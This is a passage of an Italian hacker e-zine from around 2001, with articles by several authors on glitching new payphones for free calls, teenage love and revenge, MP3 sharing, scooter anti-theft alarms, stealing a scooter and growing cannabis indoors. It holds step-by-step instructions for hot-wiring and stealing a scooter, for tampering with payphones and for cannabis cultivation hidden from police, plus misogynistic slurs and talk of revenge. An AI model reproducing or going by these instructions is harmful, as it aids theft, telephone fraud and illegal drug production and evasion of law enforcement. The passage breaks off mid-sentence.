autoexec.bat dovrà essere specificato il path del file java.exe, altrimenti non funzionerà J.Vi consiglio di creare un file batch con la riga qui sopra, per automatizzare la procedura di avvio (che altrimenti diventa un po' noiosa). In realtà l'sdk dovrebbe partire con il file toolkit.exe, ma io non sono riuscito a farlo funzionare. Spero la mia spiegazione vi abbia soddisfatto se no mailatemi e fatemi capire il perchè. ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø COME T'INFLIPPO LA NUOVA CABINA ø ø mR_bIsOn ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Titolo: Come t'inflippo la nuova cabina Autore: mR_bIs0n Musica ascoltata: MP3 a palla... punk in partikolare Consumo: ho appena finito di mangià Stato di Salute: Mah kosì e kosì... ahhh kome era bello kuando avevo la varicella... Abbigliamento: casual... tanto ke ve ne frega... Saluti: A tutti i miei amici sia di IRC ke della skuola, un partikolare saluto a Davide, Biby e Carmine (degli WinME dipendenti... ah povere menti... lo zio Bill si è mangiato anke le loro...), tutta la nostra nuova crew e a tutte le ragazze bellissime ke konosko ma non sto qui a dirvele! Fanculo: Bah... diciamo in partenza a Fabio Fanizza, Giuseppe Pasanisi e Alessandro Ceino, gli immankabili... poi anke a tutte le prof.esse, anzi megli a tutte le proFESSE! Porka eva, krepate! Urka iniziamo!!! Bene, bene... hanno montato le nuove cabine telekozz... uhmmm... ma ke son belle... ma ke son karine... insomma, leggetevi l'art di RadioZer[0] per saperne di più! Comunque c'è qualkosa ke ankora nessuno può dirvi... ihihihih... e cioè ke kodeste kabine sono nuove e quindi sono piene di bugs! E proprio kosì! Infatti vi rikordate delle cabine della telekozz ke avevano montato nel 1990 per i mondiali e ke erano buggate e bastava premere in kontinuazione il tasto del kambia lingua per kiamare gratis??? Bene anke a kueste nuove ci sono degli errori ke la zia Telesuck non ha ankora korretto... ci potrebberò essere molti bugs, ma io vi parlerò uno in partikolare ke sono riuscito a skoprire! Oki! Stavo nella mia kara villa (giardini pubblici) dove avevano montato delle nuove kabine... uhmm... vediamo un po'ke se po'fare! Allora mi prokuro un po' di skede skarike... provo ad inserirne una... me la risputa! Ma porka puttana ti faccio vedere io! La ficco con forza la kabina fa forza a risputarla, ma non riesce... mentre si dimena alzo e abbasso la cornetta... ihihihih... la cabina inizia a suonare kome una matta! Eheheh bene, bene! Ma kosa succede? Iniziano ad uscire strane skritte! La mia skeda se la prende dentro e non me la da'più! Ah porka! Ad un certo punto lo skermetto si fa nero ed eskono altre skritte... uhmmmm! Ad un certo punto esce anke uno strano menù!!! UAU!!! Non ho kapito un kazzo di kosa sia successo nè mi rikordo kome ho fatto! Porka eva! Oki ci provo altre volte... la kabina in questione si pappa 4 mie skede vuote... tutt'ora la kabina non nè accetta di altre! Ihhiihihhihi! Ma niente paura! Vi spiego io kome fare ad inflipparla! Prokuratevi una skeda Ricaricard della Tim! Usatene una usata, mi rakkomando! Vanno bene anke di altre società telefoniche! L'importante è ke siano della stessa grandezza! Poi prendete la skeda, e togliete (se c'è!), akkuratamente l'adesivo dove c'è skritto il kodice usato! Pulite kon un panno o della karta igenica imbevuta di alkool etiliko la superfice dove c'era prima l'adesivo. In questo modo la vostra skeda non si incepperà facilmente nella kabina! Oki ora fatto ciò infilate la skeda nella kabina... hiihi la prima skritta ke vi uscirà è kuesta: 'frode' EHEHEHEH da scirokkati!!! Bene ora infilate la skeda... non entrerà tutta! Poi ve la vorrà sputare, e voi nel mentre ke ve la sputa la spingete sempre più dentro! Mentre fate kuesto alzate e abbassate la kornetta in kontinuazione! Vi sembrerà tutto + facile kuando lo farete! Attenzione a non farvi prendere per un pazzo!!! Bene se dopo un certo punto uscirà skritto 'Chiamata E&M attiva'... oppure uscirà skritto ke il telefono è fuori servizio siete vicini ad impallarla! Fate tutto kuesto per 5 minuti buoni... vi assikuro ke funziona! Appena s'inflippa lo skermo si riempe di cursori neri... lampeggianti... dopo un po' un sakko di strane skritte ke sto ankora annotando... mooolto presto ci sarà un altro art kon annotate tutte le skritte ke la kabina ci dà! Bene quindi aspettate e pregate ke ci sia un metodo per kiamare aggratiz... mi fate un piacere se pregate anke per i miei semini di marja e ke kreskano presto!!! Salutoni!!!! mR_bIs0n --------------------------------------=Riflessione=-------------------------------------------- ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø RIFLESSIONE ø ø Jrash ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø _-_-L amore, l amore_-_- Crew : H@team E-mail: jrash@hackersat.com URL : www.hackersat.com Ciao ragazzi sono Jrash, il vostro fedele amico, per alcuni invece sono il nemico numero1; vabbe ora non ci importa non so proprio cosa dirvi, non so neanche perche scrivo quest articolo, neanche perche sono nato, non so perche esiste la scuola , perche esistono le cose brutte e quelle belle!! Ora leggerete un articolo che un amico ha scritto su di me prendendomi come esempio ed appunto si rivolge a tutti voi lettori, buona lettura.... Una delle cose che mi fa riflettere e riguarda noi ragazzi è l amore! Ma non riguarda solo noi ragazzi anche le ragazze, pero in quest articolo mi riferisco ai ragazzi.. Ci sono ragazze che ci piacciono e per questo che ci vengono i cosidetti "ingrippi". L amore è una cosa bellissima ma puo trasformarsi anche in cosa orribbile, soprattutto quando noi amiamo, ma questo sentimento non ci viene ricambiato...non sara cosi per tutti ma alla maggior parte di noi capita proprio questo. Cosi ci chiudiamo in noi stessi ed allora si fanno cose indegne tanto piu indegne quanto piu è grave la situazione; a questo punto si impazzisce si fa di tutto: c è chi porta la foto dell amata con se e quindi per lui è come se al mondo esistesse solo lei ; chi cade nell alcool e tantopeggio chi cade nell tunnell maledetto della droga, solo per una stronza, e...stronza o meno ti puo rovinare la vita. Ci sono pure altre cose che si fanno per una stronza cose da un certo lato piacevoli , ma da un altro lato possono peggiorare la situazione: per esempio chi è come Jrash, quando riceve un "palo" o peggio ancora, decide di vendicarsi contro la stronza( cosi merita di essere chiamata) ed allora Jrash e quelli come lui ne combinano di tutti i colori e ripagano l offesa con la stessa moneta anzi con gli interessi, perche ricordate che a Jrash mai nessuno gli ha messo i piedi in testa e chi ci prova soltanto la paga amaramente. Prendetela come una minaccia. Jrash è uno di quelli a cui non gliene fotte niente , lui non ha paura di nessuno e a chi osa contrastarlo gli dice: " meta fa nu buc*****" . Cmq ora basta riprendiamo all argomento di prima e cioe l amore come metafora spaziale( s fa p dic, capisc a me); in amore ci sono due modi per prevalere nel rapporto: o devi essere dolce e romantico, oppure come direbbe il mio amico Christopher: ia cummanna (devi dominare con forza) soprattuto se la tua ragazza è un po "zucculell" e questo si verifica nel 70% dei casi. Ma a volte anche noi siamo cattivi perche guardiamo solo l aspetto esteriore delle ragazze, ma la prima cosa che noi dobbiamo guardare è l aspetto interiore, come sono fatte dentro, cosa provano, ecc... perche a me quelle "solo curve" e senza cervello, ne cuore non mi piacciono affatto. Riguardo alle ragazze di bassa bellezza noi ragazzi le trattiamo male, con disprezzo ma Jrash si limita a fare questo, se una ragazza non è una miss mica gielo va a dire, ma cerca in tutti i modi di non offenderla; anche se a molti sembra un personaggio oscuro non lo è ve lo assicuro, vi dico solo che anche lui ha un cuore , anche lui è capace di amare e di provare altri sentimenti. Con questa descrizione non mi riferisco solo a lui ma anche a molti altri che hanno il suo stesso atteggiamento, io per questo li stimo tutti perche so quello che provano e come si sentono , perche anche Jrash è passato per questa esperienza e la sta ancora vivendo. Lui sta male, per lui la vita non ha piu senso, a volte pensa di voler morire, se non era per me l avrebbe gia fatto, percio si comporta in questo modo, cercate di capirlo. Ragazzi ora non voglio andare per le lunghe voglio solo augurarvi tutta la felicita che esiste al mondo in tutta la vostra vita , che dobbiate avere fortuna soprattutto in amore, che la ragazza che vi piace non sia come quella che piace a Jrash altrimenti passerete le pene dell inferno e ... basta non ho nient altro da dire. Solo un ultima cosa riferita al mio amico Jrash : non mollare, fagliela pagare pensa a maryee che è migliore di quella stronza.. ciao a tutti!!! ANONIMO. Ragazzi questo mio amico di cui mi ha pregato di non farne il nome è un grande e credo che abbiate capito il senso dell articolo... certo l ho modificato perche la versione originale era abbastanza lunga e poi si riferiva solo alla mia persona ed appunto per premiare la sua bonta ho deciso di farlo pubblicare. Ringrazio tutti coloro che mi sostengono e saluto tutti i lettori... alla prossima!!! Ringraziamenti: Maryee perche è troppo bella; ed A[v]a[t]A[r] perche mi è stato sempre vicino!! Un FUCK OFF a quella stronza di Giada; a Dolcissimo e Popo, due bravi lamerucci.... Inoltre potete scrivermi se ne volete discutere al seguente indirizzo: jrash@hackersat.com JRASH^^ 20/01/2001 ===================H@team=====================================================[ThE_rEaL_JrAsH^^]° ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø INTERNET E REALTA' ø ø Jrash ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Internet e Realta!! Ciao ragazzi sono sempre io Jrash^^ . Come sapete sono nel mondo dell hip hop e proprio per questo scrivo questo articolo.. Leggetelo tutto mi raccomando!! Non sono un mc non ho mai scratchato né usato i piatti , non sono un writer e non ballo . Faccio parte della schiera che vuole amare , capire, studiare interpretare e vivere l hip hop alla sua maniera....ed anche diffondere , perche no?? Basta che questo si tramuti in una diffusione positiva . Ossia non imposta del tipo: io ascolto l hip hop e tu la truzzo music. Cambia testa di cazzo! Ma spiegata, perche alla fine i gusti sono gusti , non saro certo io a convincerli che sono deficienti. Credo che alla fine bisogna avere almeno una fiammella dentro che bruci per l hip hop, magari inconsapevolmente, ma che poi, al momento buono esploda e si incendi dentro il corpo, lo spirito, il cuore.Diffusione positiva allora. E qui arrivo al cuore del discorso: internet ed aggiungiamoci la parola MP3 che ultimamente fa tanto fico. Purtroppo attualmente tranne poche sortile a casa , mi sono dovuto allontanare un po da quello che per due anni è stato il mio mondo . Navigo moltissimo e dedico tutto il mio tempo online ai misconosciuti gruppi di discussione , uno dei mezzi piu interessanti per dire la propria opinione , ed alle famigerate chat, tramite MIRC , troppo spesso invase dai cosidetti "lamer" , ossia gente che fa casino apposta . E naturalmente scaricavo MP3. Internet mi ha permesso di conoscere amici eccezionali , di poter girare l italia sicuro di poter trovare comunque un posto dove passare la notte ed altro. Certo oltre alla cosidetta "virtual life" , porto avanti parallelamente la stessa vita senza essere schiavizzato , come purtroppo tanti, troppi finiscono , dal mostro Internet. Non ha senso chiudersi in stanza e vivere solo online , magari perche si è piu sfigati fuori. Tramite Internet si mantengono contatti con persone che hanno i tuoi stessi gusti o con cui ti senti in sintonia. il punto su cui mi preme soffermare l attenzione sono gli MP3 . Tramite appositi programmi scambio MP3 di rapper italiani sempre e solo allo scopo di diffondere e scegliere meglio i miei acquisti in CD. Credo che l utilizzo migliore alla fine sia questo, diffondere via internet alcune canzoni di un album a mo di assagio per orientare l acquisto di utilizzare gli MP3 per diffondere i pezzi di quei gruppi o rapper sconosciuti che cosi possono iniziare a farsi sentire. PS: chi vuole capire, capisca!! Ho scritto questo articolo per fornirvi maggiore conoscenza in campo, non per fare pubblicita occulta. Ringrazio tutti i lettori dei miei articoli!! GRAZIE!! Ringraziamenti: un saluto agli amici dell H@team!! Un FUCK OFF a Dolcissimo e Popo!! JRASH^^ 22/01/2001 ===========HACKERS@team=====================================================[ThE_rEaL_JrAsH^^]° -----------------------------------------=Mezzing=--------------------------------------------- ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø COME RUBARE UN MOTORINO ø ø Jrash ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Salve ragazzi sono Jrash l esperto in scooter; in questo articolo vorrei parlarvi di un argomento abbastanza interessante: come rubare un motorino! La cosa è semplicissima, ma tutto il contenuto di questo testo è da ritenersi dannoso, quindi non applicabile. L utente è pregato di non mettere in atto quanto scritto. Esso è solo stato pubblicato per offrire una maggiore conoscenza in campo, NON per altri scopi. Il testo non si puo modificare tantomeno vendere senza il consenso dell autore. La prima cosa da fare è cercare un posto isolato dove non ci sia nessuno eccetto lo scooter, altrimenti che diamine! cosa rubiamo! Assicurarsi che non ci siamo catene, bloccadischi e altre cose perche renderebbero l operazione molto piu complicata, e per fare questo dobbiamo impiegare massimo 5 minuti, e non di piu!!Una volta fatto questo passiamo alla parte piu interessante, sempre avendo gli occhi ben aperti e sempre pronti a fuggire nel caso che venisse qualcuno. Allora riprendiamo da quello che stavo dicendo prima : 1)La prima operazione da effettuare per accedere al vano retroscudo e al blocchetto commutatore, dove si trovano i cavi per l accensione, è la rimozione dello scudo anteriore. 2)Smontare la plastica posizionata dietro allo scudo ; se quest operazione vi rende la cosa difficile vi consiglio di distruggere lo scudo anteriore, nella maggior parte dei casi è la cosa migliore da fare, senza pero intaccare le parti vitali dello scooter, come il blocchetto commutatore eccetera perche seno altrimenti sarebbe la fine. 3)Dopo aver smontato o distrutto la parte anteriore , individuare il cablaggio principale del blocchetto di accensione. 4)Sfilare i due connettori del cablaggio principale dello scooter unire i fili facendo attenzione, perche i fili sono tre e solo due devono unirsi. 5)A questo punto bisogna solo rompere il bloccasterzo se c é. Per farlo bisogna dare un netto colpo forte e preciso, accendere lo scooter tramite start del carter oil e fuggire alla massima velocita... lol Ringraziamenti: Meryee di #secolo per la sua bellezza; A[v]a[t]A[r] dell H@team per la sua potenza e inoltre vorrei fare un saluto a tutta la 3c del severi di salerno! Un FUCK OFF a popo e Dolcissimo!! JRASH^^ 13/1/2001 =============jrash@hackersat.com====H@team===========================================[Jrash^^]° ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø COME SCEGLIERE E MONTARE UN VALIDO ANTIFURTO ø ø SUL VOSTRO SCOOTER Jrash ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø (*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*) Autore: Jrash^^ Crew : H@team E-mail: jrash@hackersat.com URL : www.hackersat.com (*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*) Salve ragazzi sono JRASH l esperto in scooter, in questo articolo vorrei parlarvi di un grosso problema: nel nostro paese i furti di scooter sono all ordine del giorno e , proprio per questo ho deciso di darvi dei consigli sulla scelta e il montaggio di un antifurto elettronico. Prendiamo subito in considerazione tutti i requisiti essenziali di un antifurto elettronico affinché possa essere definito tale . In primo luogo vi consiglio di diffidare di prodotti di non chiara provenienza: fidatevi esclusivamente di antifurto di produzione nazionale o importati da aziende di una certa serietà, per poter usufruire di un assistenza valida. L evoluzione di questi sistemi è veramente frenetica ed ora è possibile trovare in commercio antifurto sempre piu piccoli , efficienti, impermeabili e facili da montare, grazie a dei cablaggi specifici dedicati alla maggioranza degli scooter presenti in commercio . E cosi possibile effettuare il montaggio semplicemente sfilando le connessioni elettroniche originali e inserendo "a ponte" quelle dell antifurto . è estremamente importante che questo sia autoalimentato , in modo che possa continuare a funzionare anche in caso del taglio dei cavi della batteria , che sia provvisto di codice variabile e bloccomotore , che magari sia dotato del sistema antiaggressione , per prevenire i tentativi di rapina quando si è gia in sella alloscooter. Ora vi spiego il procedimento di montaggio, su uno scooter qualsiasi, di un antifurto patron line, uno dei piu evoluti sul mercato, gia dotato di un cablaggio specifico. 1)La prima operazione da effettuare per accedere al vano retroscudo ed al blocchetto commutatore è la rimozione dello scudo anteriore. 2)Smontare la plastica posizionata dietro allo scudo. 3)Rimuovere la parte bassa del cruscotto. 4)Dopo aver smontato la parte anteriore della carena dello scooter, individuare il cablaggio principale del blocchetto di accensione. 5)Sfilare i due connettori del cablaggio principale dello scooter e montare "a ponte" il cablaggio dell antifurto: i connettori sono del tipo a innesto obbligato, quindi l operazione è estremamente semplice. 6)Cablaggio principale assemblato al cablaggio dell antifurto. 7)Individuare i cablaggi degli indicatori di direzione. 8)"Ponticellare " i fili del positivo delle frecce con i fili provenienti dall allarme utilizzando gli specifici connettori a pressione. 9)Connessione con i fili degli indicatori di direzione ultimata. 10)Fissare l antifurto , con il nastro biadesivo fornito nel kit; in una parte sufficientemente riparata del vano retroscudo. 11)Ora non ci resta che istallare la spia luminosa su una parte del cruscotto….. Ringraziamenti: Maryee(#secolo) perche senza di lei non potrei vivere ;A[v]a[t]A[r] , dell H@team, perche senza di lui ora non sarei qui!! Se volete potete scrivermi per ulteriori informazioni a : jrash@hackersat.com JRASH^^ 31/12/2000 ###########################°ò_jrash@hackersat.com_ò°################################[Jrash^^] -----------------------------------------=Narcoting=------------------------------------------- ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø MARIA COLTIVATION ø ø phaet ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø INTRODUZIONE Ci sono poche cose nella vita buone quanto la propria erba, coltivata proprio da te, fuori nel giardino e dentro nei vasi... L'origano, l'aneto, il basilico, la salvia ed altre piante aromatiche sono tutte facili da coltivare. La menta si espande in tutto il giardino, se la lasci fare. La menta piperita e il celantro sono fantastici in insalate e piatti orientali. Ma tutto ci porta ad una pianta veramente significativa che, per chi la conosce bene, è la migliore amica, un ottimo rimedio naturale e una filosofia di vita. La maggior parte della gente pensa ai giardini come un progetto stagionale anziché annuale, ma è davvero meno dispendioso e più rimunerativo mantenere il giardino efficiente a rotazione annuale. Se sei tentato a coltivare a rotazione annuale, avrai bisogno di tecniche di giardinaggio al coperto almeno per il periodo invernale per mantenere il giardino produttivo. Avrai erba fresca tutto l'anno, non dovrai preoccuparti di immagazzinare il raccolto tra l'inverno e la primavera, richiede meno spazio, ed una volta sistemato, richiede solo una minima attenzione ogni settimana per mantenerlo produttivo a livelli ottimali. Il lato migliore dell'essere un giardiniere è il rapporto con la terra. Ti congiunge con la natura e ti arricchisce spiritualmente. Prova a dare energia alle tue piante trasmettendo loro pensieri positivi ed energia ogni volta che vai a curarle. Trovo che questo aiuta molto me come aiuta molto loro. Le mie piante sembrano rispondere favorevolmente. [N.d.T.: Le affermazioni di quest'ultimo periodo sono alquanto discutibili!] LA GENETICA E LA PIANTA E' molto importante cominciare con buone nozioni di genetica. Dovresti cercare di trovare da giardinieri del posto semi che siano acclimatati e riprodotti per il clima locale con le migliori caratteristiche floreali. Potenza, aroma, crescita rapida, maturazione precoce, resistenza ai funghi e ai parassiti. Tutti questi fattori sono presi in considerazione dal giardiniere esperto e tu non potrai che trarre innumerevoli benefici dall'avere un'amica che ti faccia partire in un viaggio senza fine. Cerca di procurarti un ibrido Indica-Sativa se possibile, in modo da ottenere le dimensioni più indicate ed anche ottime caratteristiche per la coltivazione al coperto. Le piante Indica sono povere di principio attivo, adatte a terreni sassosi, cosa assai fastidiosa, mentre le Sativa crescono con difficoltà nei luoghi chiusi per effetto delle elevate richieste di luce e germogliano più tardi. Un ibrido può essere così un compromesso che avrà l'elevato effetto psicotropo della Sativa e la tendenza alla maturazione precoce dell'Indica. L'Indica è facilmente riconoscibile dalle sue foglie estremamente larghe che sono molto arrotondate ai lati. La Sativa ha foglie molto strette, simili alle dita. Un ibrido avrà le caratteristiche di entrambe con foglie che sono un incrocio di questi due tipi: più sottili di un'Indica, ma molto più larghe di una Sativa. E' possibile riconoscere un buon ibrido dalle foglie, una volta che hai capito cosa osservare. Assicurati che i semi siano marrone scuro o grigio chiaro. Alcuni possono avere delle linee scure in aggiunta a questi colori, come le striature di una tigre. I semi bianchi e piccoli non sono maturi e non dovrebbero essere piantati. DENTRO E FUORI: STRATEGIA DEL RACCOLTO COSTANTE Una delle migliori soluzioni per fornire energia secondo la maggior parte dei giardinieri domestici è quella di servirsi della luce solare all'esterno per la fioritura e della luce continua all'interno per germogliamento e la crescita vegetativa. Ciò garantisce il vantaggio di un naturale ciclo di luce/buio e riduce della metà il tuo consumo di energia in rapporto alla stessa operazione all'interno. Una piccola serra può essere costruita in fibre di vetro Filon o in pannelli di PVC che sono innocui e sembrano molto ad un capannone di deposito o ad un capannone degli attrezzi, in più è poco probabile che desti sospetti. Di fatto un grande capannone di metallo o di legno compensato può essere modificato con un tetto luminoso di PVC, vetro, fibre di vetro o pannelli di plastica, ed alcune specie che non richiedono una grande quantità di luce, cresceranno bene. Un capannone siffatto impedirà avvistamenti dal cielo e ti permetterà di proteggere la tua attività! Ti consente anche di tenere lontani ratti e tartarughe gopher, mantiene a distanza i mocciosi del vicinato e può essere facilmente chiuso a chiave. Ti darà anche l'opportunità di piantare effettivamente nel terreno, se lo vorrai, e questa è la migliore soluzione per evitare piante ancorate a terra da radici (se non stai usando colture idroponiche), ed ottenere raccolti più abbondanti. In inverno lo spazio al coperto viene di norma usato per iniziare con le nuove pianticelle o i tagli, per essere portati fuori in primavera, utilizzando la luce naturale del sole per maturare le piante. Questa routine garantirà almeno tre raccolti aperto/serra per anno. Se è disponibile più spazio per cominciare continuamente all'interno e per fiorire le piante del secondo raccolto all'aperto, sono possibili raccolti ogni 60 giorni nella maggior parte delle località, con un piccolo raccolto al coperto durante la stagione invernale come ulteriore possibilità. La strategia di base per una produzione nel corso di tutto l'anno è capire se la pianta ha due cicli di crescita. Durante la germinazione la pianta entra in uno stato vegetativo in cui potrà usare tutta la luce continua che riuscirai a garantirle. Questo significa che nessun ciclo di buio è richiesto. La pianta sarà costantemente in fotosintesi e crescerà più velocemente di quanto accadrebbe all'aperto con lunghi intervalli di notte. La fotosintesi si arresta durante la fase di buio e la pianta usa gli zuccheri che ha prodotto per crescere durante la notte. Questa non è una necessità ma la pianta crescerà più velocemente in questa fase con una continua fotosintesi (luce costante). Una volta che la pianta è alta 30-50 centimetri, tempo permettendo, può essere forzata a cominciare la fioritura portandola fuori nel periodo primaverile o autunnale. (Per la fioritura estiva all'aperto, la notte deve essere artificialmente allungata nella serra per "forzare" le piante a fiorire. Vedi il capitolo 'Fioritura'.) Portando le piante a periodi di 10-13 ore di luce (spostandole all'aperto) con oscurità ininterrotta (nessuna sorgente di luce intensa nelle vicinanze) le si forzerà a fiorire. Matureranno e saranno alte 50-100 cm quando saranno pronte per il raccolto. Quando una pianta viene spostata da una sorgente di luce continua al coperto ad un periodo di 10-13 ore al giorno fuori, comincerà a fiorire prevedendo un'incombente inverno. I processi vegetativi spostati all'aperto il 1° marzo, saranno giunti a maturazione il 1° maggio. I processi vegetativi spostati all'aperto il 1° maggio, saranno giunti a maturazione il 1° luglio. I processi vegetativi spostati all'aperto il 1° settembre, saranno belli pronti per il 1° novembre. In Inverno queste operazioni vengono compiute all'interno e una pianta viene piantata per semenza in previsione di piantare all'aperto l'estate successiva, o soltanto per avere un po' di roba extra da parte per l'inverno. Tieni presente che lo sbirro va in cerca delle piante nel periodo tra settembre e novembre, e non può in alcun modo notare in aprile piante sistemate all'aperto che fioriscono. Sii furbo, fatti il tuo gran raccolto in maggio, non in ottobre! COLTIVARE DENTRO Si dovrebbe trovare un piccolo spazio al coperto in modo da servirsene per germinare i semi. Questi processi vegetativi iniziali vengono poi portati all'aperto per maturare in primavera, dopo la fine delle ultime gelate. Lo spazio può essere uno sgabuzzino, una zona della camera da letto, un'area della cantina, una soffitta o un bagno non usato. Alcune persone dedicano l'intera camere da letto alla coltivazione. Lo spazio non dovrebbe avere fessure che lasciano filtrare la luce, in modo tale che nessuna luce sospetta possa essere vista dall'esterno. Ciò potrebbe attirare pulotti o ladruncoli. Lo spazio dovrebbe essere ventilato. Lasciando aperta la porta di uno sgabuzzino potrebbe esserci ventilazione a sufficienza se lo spazio non è illuminato da forti luci che generano molto calore. Separare l'aria viziata in uscita e quella buona in entrata è la cosa migliore. Una presa d'aria in cima alla stanza per eliminare l'aria pesante verso la soffitta o fuori dal tetto, ed una per portare dentro aria dall'esterno o da una grata sotto il pavimento. Serviti di ventole di raffreddamento di vecchi computer, disponibili da rivenditori di elettronica per 5 dollari americani. Interruttori a reostato possono essere usati per regolare la velocità o il rumore dei ventilatori. Usa silicone per assicurare i ventilatori a tubi in PVC di 10-15 centimetri infilati in buchi tondi aperti nel pavimento e sul soffitto. Usa molto silicone per attutire le vibrazioni dei ventilatori, in modo che i muri non entrino in risonanza con le oscillazioni delle ventole. Rivesti i muri con fogli di alluminio, il lato opaco all'esterno per diffondere la luce e prevenire i punti caldi, oppure dipingi i muri di bianco riflettente per meglio propagare la luce. Pannelli calorizzati, dello spessore di 0,02 millimetri sono la cosa più indicata. (20 dollari per 7,5 metri di 1/4 di un rotolo esteso.) Gli specchi non sono molto indicati, visto che il vetro assorbe la luce! Rivesti il pavimento con fogli plastificati in caso di spargimenti d'acqua, ecc... Installa una presa di interruzione della tensione (salvavita) ed assicurati che il cablaggio elettrico regoli le lampade secondo le tue esigenze d'uso. Usa sempre regolatori di corrente per lampade HID su mensole, e anche per quelle che si trovano sopra il livello del pavimento, in caso di spargimenti d'acqua. Mettendo prolunghe sul pavimento sotto i regolatori di corrente, andrà bene lo stesso. Una mensola sopra la principale area di coltivazione può essere usata per clonare i tagli e germogliare le pianticelle. Permetterà inoltre di raddoppiare l'area di coltura e sarà un inapprezzabile spazio di deposito per i nutrimenti della pianta, bombolette spray ed altro materiale da giardinaggio. Questa area si mantiene molto calda, così non ci sarà bisogno di alcun sistema di riscaldamento per la fase della germinazione, permettendoti di risparmiare parecchi soldi. Appendi una tenda che non fa passare la luce per separare questa mensola dall'area principale quando la stai usando per la fioritura. Questo ti permetterà di fornire luce costante alla mensola e periodi di buio nell'area principale dedicata alla coltivazione. Del velcro può essere utilizzato per tenere le tende unite al loro posto e dei lacci per avvolgerle quando controlli l'area di coltivazione. Vinile nero con sostegni bianchi funziona meglio. Ora hai bisogno delle luci. Un paio di luci da negozio andranno benissimo se vuoi iniziare soltanto con piante all'interno per poi trasferirle fuori per crescerle in una piccola serra. Possono essere acquistate con lampadine per circa 10 dollari ciascuna, o senza lampadine per circa 8. Cerca di trovarle in svendita. Usa un tipo di lampadina a luce chiara (bianco freddo) ed una a luce calda per ottenere il più ampio spettro di luce possibile per la crescita della pianta. Non usare tipi di lampadine specifici per la coltura, perché come non emettono molta luce, così pure non servono a nulla nella maggior parte dei casi. Se sei riuscito a trovare soltanto una luce chiara, o è tutto ciò che puoi permetterti, usala. Funziona benissimo ed è di gran lunga la più conveniente (circa 1-2 dollari l'una). UNA MENSOLA CHE CRESCE Il trattamento della mensola con illuminazione a fluorescenza può essere la strada del futuro, dal momento che il materiale è così poco costoso e facile da reperire. Le lampade fluorescenti sono l'ideale per la cura della mensola. Con questo sistema possono essere installate molte mensole, una sopra l'altra, e lampade fluorescenti per ciascuna mensola. Alcune mensole avranno 24 ore di illuminazione, altre soltanto 12 ore (per la fioritura). Due aree vanno meglio, magari con un'altra dedicata alla clonazione e alla germinazione dei semi. Il trattamento della mensola presume il tuo impegno nel mantenere tutte le piante sui 90 cm o meno alla maturazione, in modo da lasciare tutte le mensole separate da 90-120 cm. Non è necessaria molta luce, quando hai piante che sono così piccole e forzate a maturare in fretta. Uno svantaggio per una coltivazione su mensole di questo tipo è dato dal fatto che si impiega proprio molto tempo a regolare l'altezza della lampada ogni giorno, ed è molto difficile riuscire a prendere un periodo di ferie per anche una sola settimana senza curarsi del piccolo giardino. Questo è rivolto in particolar modo allo stadio vegetativo, quando le piante crescono molto anche di 2-3 cm al giorno. Le lampade sulle mensole in fase di fioritura non vengono regolate così spesso. Normalmente, le lampade dovrebbero essere tenute 5 cm sopra le piante, con le piante sistemate in modo tale che diventino progressivamente più alte mano a mano che la lampada viene portata in alto, e tutte le piante rimangano costantemente alla distanza di 5 cm. Questa è comunque una soluzione, e se vai in vacanza, regola le lampade in modo da essere sicuro che le piante non potranno crescere fino alle lampade in questo lasso di tempo. Se lampade abbastanza fluorescenti sono usate per illuminare completamente la mensola, la disponibilità di spazio non creerà piante lunghe ed esili. Cresceranno soltanto un po' più lentamente se le lampade non sono proprio vicine a loro. Un'alternativa è usare lampade fluorescenti per la clonazione, la germinazione e la crescita della piccola pianticella nella parte alta di uno stanzino, quindi passare ad una lampada HPS per una crescita vegetativa o fioritura accelerata nell'area principale dello sgabuzzino. Posiziona l'HPS in modo tale che non avrà bisogno di ulteriori sistemazioni, sul punto più elevato dello sgabuzzino o della stanza. La maggior parte delle installazioni di HPS non richiederanno regolazioni dell'altezza della lampada. Fissa soltanto la lampada alla parte inferiore della mensola o sul soffitto più in alto che puoi, e se vuoi mettere alcune piante più vicine alla lampada, sistemale su una mensola provvisoria, uno scatolone o un tavolo. Una mensola è tutto ciò di cui hai bisogno per questo tipo di trattamento, preferibilmente larga almeno 50 cm, fino a un massimo di 60. Questa area deve essere verniciata con colore bianco riflettente, o coperta con una lamina di alluminio, con il lato opaco all'esterno per riflettere la luce alle piante. (Il Iato opaco all'esterno previene i punti caldi, cioè le sovraesposizioni di luce in particolari zone 